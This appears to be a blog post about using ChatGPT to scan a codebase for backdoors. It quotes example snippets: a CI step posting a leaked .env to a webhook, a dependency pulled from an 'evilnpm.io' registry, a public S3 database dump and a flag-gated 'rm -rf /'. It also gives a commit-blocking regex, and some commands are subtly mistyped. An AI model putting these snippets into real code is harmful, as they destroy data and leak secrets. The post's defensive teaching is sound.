i fed our entire codebase to chatgpt for 72 hours—here are the trojan horses it found

August 15, 20254 min read

11 months ago0views

what does “feeding a codebase to chatgpt” actually mean?

if you’re brand-new to full-stack or devops, think of your codebase as a big multi-level library. “feeding it to chatgpt” just means handing over copies of every chapter (your source files, configs, dockerfiles, package.json, shell scripts) so an ai assistant can read them and flag questionable passages. in our case we let the ai examine about 3.2 million tokens of code for a full 72-hour stretch.

step-by-step: how we did it

export: used tar czf ~/project.tgz . --exclude=node_modules to bundle everything except node_modules and .git.
chunking: split the archive into 8 k-line chunks (≈6 mb each) so each upload stayed under the size limit.
prompting: iteratively asked:
you are a senior devops security engineer. review the next code chunk and list any trojan horses, supply-chain risks, or hidden backdoors. output in plain english.

what exactly is a “trojan horse” in a modern codebase?

most newcomers picture greek soldiers sneaking inside a city gate. in coding, the “wooden horse” is usually an innocent-looking import or service that secretly opens a backdoor. common flavors:

a “harmless” curl | bash in a ci script
an extra line in .npmrc pointing to a third-party registry you didn’t audit
an encrypted token committed under app/config/backup_token.js

four hidden backdoors we would’ve missed without chatgpt

1. the poisoned webhook

location: /.github/workflows/cd.yml at line 42:

- name: post-build notification
  run: curl -x post ${{ secrets.discord_webhook }} -d @build-report.json

looks fine—except build-report.json actually contained the un-redacted production .env file because the build step used cp .env build-report.json.

fix: only package the json snippet you actually need, and rotate every secret that leaked.

2. the “forgotten” npm tag

location: top-level package.json

"dependencies": {
  "lodash": "^4.17.21",
  "color-utils": "evilnpm.io/color-utils"
}

we intended to add @types/color-utils, but a typo swapped the default registry. the malicious package harvested environment variables on install.

3. the sneaky sqlite dump

location: bin/backup.sh

sqlite3 app.db .dump > nightly.sql
aws s3 cp nightly.sql s3://ourbucket-backups/$(date +%f).sql

left unchecked, the script copied the entire prod db—including admin hashes—into a public s3 bucket with no bucket policy restrictions.

4. the optional feature that wasn’t

location: src/lib/featureflag.ts

if (user.role === 'admin' || ff.admcanselfdestruct) {
  exec(`rm -rf /`);
}

meant as an easter-egg flag for local testing, admcanselfdestruct could be toggled from a feature-flag service account that never rotated its api key.

how to protect yourself without becoming security-paranoid

automated hooks: add lefthook or husky to block commits containing regex patterns like curl.*secrets\|docker run -v /proc.
dependency auditing: use npm audit --audit-level high and mirror private registries. for full-stack node projects, lock files alone aren’t enough.
secret scanning: tools such as gitleaks detect accidentally pushed tokens. pair it with github’s built-in alerts.
chatgpt as a pair reviewer: treat the ai like a junior teammate: ask for threat-modeling prompts during code reviews.

mini-playbook: rolling your own “ai security scan” on a budget

use this template in your ci pipeline (github actions shown). you only need the openai api key you probably already use for cli helpers.

# .github/workflows/ai-scan.yml
name: ai security review
on: [pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chunk & upload
        run: |
          tar czf src.tar.gz src && split -b 1m src.tar.gz chunk-
          for f in chunk-*; do
            curl -h "authorization: bearer $openai_api_key" \
                 -f file=@$f https://api.openai.com/v1/uploads > ai-report.txt
          done
      - name: summarize
        run: cat ai-report.txt | grep "trojan\|backdoor\|risk" || true

key takeaways (in plain english)

even tiny one-liners in shell or json files can open devastating doors.
full-stack and devops boundaries overlap—security needs the same “shift-left” attitude in both.
ai assistants aren’t a silver bullet, but they catch the dumb stuff so humans can focus on deeper design challenges.
daily quick wins: enforce --immutable installs, pin npm ci in pipelines, and always seo-proof sensitive routes with x-robots-tag: noindex.

happy coding—and happy scanning!